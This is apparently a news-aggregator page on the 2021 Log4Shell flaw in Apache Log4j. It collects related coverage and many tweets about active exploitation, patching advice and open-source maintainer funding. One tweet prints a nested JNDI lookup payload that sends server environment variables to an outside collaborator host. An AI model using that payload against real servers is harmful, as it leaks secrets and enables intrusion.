Researchers spot waves of attacks targeting unpatched Apache servers with the Log4j bug, exfiltrating data, spreading botnets, installing crypto miners, more
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers.
BleepingComputer Lawrence Abrams
Related Coverage
- The Internet's biggest players are all affected by critical Log4Shell 0-day Ars Technica · Dan Goodin
- View article AppleInsider
- Inside the Log4j2 vulnerability (CVE-2021-44228) The Cloudflare Blog · John Graham-Cumming
- RHSB-2021-009 Log4Shell - Remote Code Execution - log4j Red Hat Customer Portal
- View article Metacurity
- Microsoft's Response to CVE-2021-44228 Apache Log4j 2 Microsoft Security …
- BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC Gist · SwitHak
- View article Forrester
- Threat Alert: Log4j Vulnerability Has Been adopted by two Linux Botnets 360 · RootKiter
- Logout4Shell — A vulnerability impacting Apache Log4j versions 2. through 2.14.1 was disclosed … GitHub · Cybereason
- View article RCR Wireless News
- View article Securelist
- Companies Rush to Fix Software Exploit After U.S. Warning Bloomberg · Jack Gillum
- Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk The Hacker News · Ravie Lakshmanan
- Log4Shell & massive Kinsing deployment ProferoSec · Yuval Fischer
- Security Advisory Summary SolarWinds
- What is Log4Shell, and why are we panicking about it? — Find out what the Log4j2 Log4Shell panic … ComputerWeekly.com · Alex Scroxton
- ‘Log4j flaw can potentially affect 3 out of 10 websites across globe’ TechCircle · Shouvik Das
- Log4Shell flaw: Government asks organisations to check server security Silicon Republic · Vish Gain
- Log4Shell attacks are spreading fast after flaw exploited TechRadar
- ‘Vaccine’ against Log4Shell vulnerability has potential — and limitations VentureBeat · Kyle Alspach
- 👋 Introduction — It's almost the end of 2021. Three strong years of pandemic, and there's no good end in sight. Software Kills · Stojan Dimitrovski
- Logging library for millions of apps has a serious vulnerability Engadget · Mariella Moon
- Microsoft: Log4j exploits extend past crypto mining to outright theft VentureBeat · Kyle Alspach
- Bluepurple Pulse: Log4J2 / Log4Shell Special Cyber Defence News … · Ollie
- Important Message: Security vulnerability in Java Edition Minecraft
- Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation Microsoft Security Blog
- ‘The Internet Is on Fire’ — A vulnerability in the Log4j logging framework has security teams scrambling to put in a fix. Wired · Lily Hay Newman
- “Open source” is not broken Blog on Kailash Nadh
- Log4Shell Hell: anatomy of an exploit outbreak Sophos News · Sean Gallagher
- The Log4j bug exposes a bigger issue: Open-source funding TNW · Ivan Mehta
- Statement from CISA Director Easterly on “Log4j” Vulnerability CISA
- Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228) LunaSec Blog
- Calculating my open source blast radius ENOSUCHBLOG · William Woodruff
- “Open Source” is Broken Xe's Blog
- VMSA-2021-0028.1 … 1. Impacted Products (Under Evaluation) — VMware Horizon VMware
- Log4Shell: Reconnaissance and post exploitation network detection NCC Group Research
- “Open source” is not broken OSnews · Thom Holwerda
- Log4js project sponsorship skyrockets after critical bug exploitation iTnews · Juha Saarinen
- Log4Shell exploit found to impact iCloud, amongst other services iThinkDifferent · Imran Hussain
- ZAP and Log4Shell — Overview — A vulnerability has been found in Log4j which can result … zaproxy.org
- iCloud Log4j vulnerability was fixed quickly: researchers demoed it when connecting to iCloud via the web on Dec. 9 and 10, but by the 11th it no longer worked The Eclectic Light Company · Hoakley
- Security flaw in widely-used logging system impacts Minecraft, iCloud, more MobileSyrup · Jonathan Lamont
- On Paying Open Source Maintainers Nadim Kobeissi
- Log4j zero-day flaw: What you need to know and how to protect yourself ZDNet · Liam Tung
- Apache Log4j Vulnerability N-able
Discussion
-
@campuscodi
Catalin Cimpanu
on x
Log4Shell attacks began two weeks ago, Cisco and Cloudflare say -4 major botnets spotted abusing Log4Shell right now (per Netlab) -more than 10k hosts scanning for it (per Kryptos Logic) -DDoS, crypto-miners, and CS beacons as payloads for now https://therecord.media/... https://…
-
@girlgerms
@girlgerms
on x
Some great information and guidance from Microsoft around Log4j: https://msrc-blog.microsoft.com/ ... https://www.microsoft.com/...
-
@p_malynin
Pavlo Malynin
on x
The #log4j exploit is so awesome I had to log onto my twitter for the first time in years. I have found the perfect weapon to fight iMessage and SMS scammers #Log4Shell https://twitter.com/...
-
@brunoborges
Bruno Borges
on x
So many great people worked tirelessly to get this out. Several hours, late meetings, calls, emails, chats and so on. Proud of everyone! #OneMicrosoft https://twitter.com/...
-
@yazicivo
@yazicivo
on x
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
-
@filosottile
@filosottile
on x
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. “I work on Log4j in my spare time” “always dreamed of working on open source full time” “3 sponsors are funding @rgoers's work: Michael, Glenn, Matt” People, what are we doing. h…
-
@steveruizok
Steve Ruiz
on x
I get about $2,000 a month from GitHub sponsors. Let's talk about funding for open source projects, specifically my thoughts for @tldraw. https://twitter.com/...
-
@lorenc_dan
Dan Lorenc
on x
This is going to sound blunt, but it's a distribution problem not a funding problem. $ is easy. Corporations have budget and are willing to spend, but it takes too much time. Finding projects that need help and maintainers willing to help in exchange for money is hard. https://tw…
-
@matthew_d_green
Matthew Green
on x
Watching this log4j bug metastasize, I'm seeing people ask why industry doesn't fund open source. I don't have a great answer, but I have some thoughts following the experience with Heartbleed in '14. 1/
-
@malwaretechblog
Marcus Hutchins
on x
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
-
@filosottile
@filosottile
on x
No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF “Project Management Committee”... AND NO ONE IS PAYING THEM? https://www.apache.org/... Open Source needs to grow the hell up. Yesterday. https://twitter.com/...
-
@campuscodi
Catalin Cimpanu
on x
The Apache Log4j project is maintained by three people who are volunteering their spare time. Please don't be a jerk to them because multi-billion dollar companies are using their tool without even bothering to throw $1,000 their way. https://twitter.com/...
-
@minecraft
@minecraft
on x
Player safety is the top priority for us. Unfortunately, earlier today we identified a security vulnerability in Minecraft: Java Edition. The issue is patched, but please follow these steps to secure your game client and/or servers. Please RT to amplify. https://www.minecraft.net…
-
@tha_rami
Rami Ismail
on x
Oh gosh, just reading up on this exploit and this is wild. An open source Java logging tool used in all sorts of stuff from Minecraft to government databases alike has an exploit that allows attackers to execute code or read server variables. https://twitter.com/...
-
@jj_ranalli
Jjacopo.Eth
on x
DAOs were literally born to solve this Thinking of building a tool for DAOs to fund open source projects on @github and handle treasury through @juiceboxETH Someone stop me (or join me) https://twitter.com/...
-
@chr1sa
Chris Anderson
on x
Interesting that “supply chain vulnerabilities” have become a crisis in both the physical world and the web (open source library dependencies) at the same time. The perpetual pendulum between distributed and centralized will now swing back to the latter https://www.wired.com/...
-
@stevesi
Steven Sinofsky
on x
Professional Maintainers: A Wake-Up Call https://blog.filippo.io/... // This was bound to get written, but some are probably surprised it took two decades as they were saying it way back then.
-
@lzsthw
Zed A. Shaw
on x
PSA Time Folks: https://www.minecraft.net/... If you run a Minecraft server or the client (Java edition) then you need to read this and do some work. The recent log4j vulnerability is exploitable and will cause you pain. https://cve.mitre.org/...
-
@lessin
Sam Lessin
on x
but the real answer is crypto... totally right problem to identify but invoicing companies for maintaining open source software is lol. https://twitter.com/...
-
@matthew_d_green
Matthew Green
on x
@mistersql @JRossNicoll It takes lack of attention. In Heartbleed, someone merged a dumb feature quickly without doing careful code review. In log4j someone merged a dumb feature that any security expert would have recoiled at.
-
@seldo
Laurie Voss
on x
Open source spent the 1990s trying to convince corporations they could trust it, the 2000s delighted at its success in corporations, the 2010s begging corporations to help pay for the enormous maintenance costs being shouldered by random individuals. https://twitter.com/...
-
@bmgnrs
Andreas Baumgartner
on x
„This person's spare time passion project is responsible for half of the internet working the way it should. Vulnerable companies to this issue included Apple, Google, my cell phone carrier and everyone that uses JavaEE in its default configuration." https://christine.website/...
-
@andreabarisani
Andrea Barisani
on x
Millions of $$$ are floating around bug bounties which do very little in fixing the underlying core issues we face. Yet critical dependencies which are everywhere struggle in getting adequate backing, only hostility when they break. Pay maintainers, pay proper security audits. ht…
-
@lets4r
Romain Rastel
on x
Once again, an Open Source Software maintained by a few people on their spare time, used by a lot of companies on their projects, has a big vulnerability. When companies will understand that it's on their interest to support financially OSS? https://twitter.com/...
-
@cisagov
@cisagov
on x
We urge all organizations to review the latest current activity alert and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately: https://www.cisa.gov/...
-
@matthew_d_green
Matthew Green
on x
When Heartbleed dropped, it was very similar to log4j: an underfunded OSS project (OpenSSL) that nobody thought about, but was *everywhere*. It took everyone by surprise, and even woke industry up. The result was a surge of funding. 2/
-
@gossithedog
Kevin Beaumont
on x
Okta RADIUS and MFA server are vulnerable and exploitable and need upgrading ASAP https://sec.okta.com/... https://twitter.com/...
-
@zakjan
@zakjan
on x
Open source maintainer as a career path. There are just a few companies who understand the benefits of funding open source development, and it's challenging to keep explaining that to others. Luckily I was able to find some already. Thanks for that! https://twitter.com/...
-
@gossithedog
Kevin Beaumont
on x
Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later https://twitter.com/...
-
@filosottile
@filosottile
on x
We all agree the status quo is unsustainable. Here are 1,000 words on how we could get the role of Open Source maintainer to graduate to a real, properly paid profession. The thing is, companies need it as much as maintainers do. https://blog.filippo.io/...
-
@jimj_candid
@jimj_candid
on x
When people say “you didn't build that” they're not just talking about how highways and public education contribute to corporate success. They're also talking about this. Open source is the vital foundation of nearly every corporate software asset. And it gets no respect. https:/…
-
@cisajen
Jen Easterly
on x
🚨All orgs should upgrade to log4j version 2.15.0 or apply appropriate vendor recommended mitigations ASAP! Read my full statement on this vulnerability: https://www.cisa.gov/... https://twitter.com/...
-
@laughing_mantis
Greg Linares
on x
PSA: attackers aren't just using #log4j attacks on internet facing devices. Groups I'm monitoring are going back to compromised networks and using it on subnets and on internal devices *very* successfully Insider threat is also an viable avenue of exploitation
-
@eastdakota
@eastdakota
on x
Seeing attackers exploit #Log4J to drop #Mirai. Bigger, badder botnets coming soon... 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖🤖🤖🤖 🤖
-
@caseyjohnellis
Cje
on x
hearing folks compare #log4shell is “as bad as heartbleed” - imo it's much, much worse. aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher
-
@felipecsl
Lima.Eth
on x
“open source is broken” https://christine.website/... - couldn't agree more. That's one of the reasons why I've stopped doing it myself. Unfortunately that's what we need to do in order to raise awareness to the issue that people need to be compensated for their work.
-
@runasand
Runa Sandvik
on x
Reminder that a lot of the technology we use relies on free, open source code that no one's paid to maintain. https://twitter.com/...
-
@chromatic_x
@chromatic_x
on x
Controversial opinion: RedHat, AWS, GCP, GitHub, NPM, etc should pay F/OSS developers. https://blog.filippo.io/...
-
@milesmccain
R. Miles McCain
on x
The world would be so much better off if maintaining open source software were a viable profession. One day...? https://twitter.com/...
-
@mattficke
Matt Ficke
on x
Endorse all this. There are a ton of engineers, of all experience levels, who would jump at the chance to do this kind of work if they could make a stable career out of it. https://twitter.com/... https://twitter.com/...
-
@joshuapowell_io
Joshua Powell
on x
I love when people share ideas like this, especially when they're backed by current events #opensource https://blog.filippo.io/...
-
@pixeltrix
Andrew White
on x
This is well-intentioned but saying “companies are in the business of getting what they need—by paying invoices” show incredible naivety in how bad companies are at paying their invoices https://blog.filippo.io/...
-
@oerdnj
@oerdnj
on x
This! I am thankful to all GitHub Sponsors and Patreons, but without my day2day job @ISCdotORG (which is thankfully also working on Open Source), I would be able to sustain my family. https://twitter.com/...
-
@adamwathan
Adam Wathan
on x
Great post — charity-based open source is very naive and unrealistic, if only because its 100x more complicated for a business to pay someone for nothing than it is for something. https://blog.filippo.io/... https://twitter.com/...
-
@_staticflow_
Tanner Barnes
on x
In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
-
@matthew_d_green
Matthew Green
on x
As a follow-up: @FiloSottile has a nice post about professionalizing the role of OSS maintainer. This is great! But I would still argue that money is finite, and knowing which projects need help is a basic missing ingredient. https://blog.filippo.io/...
-
@mcafee
@mcafee
on x
Have you heard about the security risk that is affecting popular websites, services, apps, and even games? Twitter, iCloud, Steam, and Minecraft servers may be vulnerable, along with a growing number of others. Here's what's going on and how to stay safe: https://www.mcafee.com/.…
-
@k8em0
@k8em0
on x
Blessed be the open source maintainers, for they shall inherit...Internet pile-ons?!? Hey, go easy on these folks who hold up the world on their backs. They deserve our support & respect, all the more during a crisis. Let's not turn already thankless work into more punishment. ht…
-
@eastdakota
@eastdakota
on x
Earliest evidence we've found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.
-
@bushidotoken
@bushidotoken
on x
The #Kinsing and #Muhstik cryptomining botnets are some of the first to exploit any new RCE vulnerability: this time it's Log4j & Log4Shell. Those two names have cropped up for several major RCEs this year, they've actually become one way to tell how bad a new RCE is.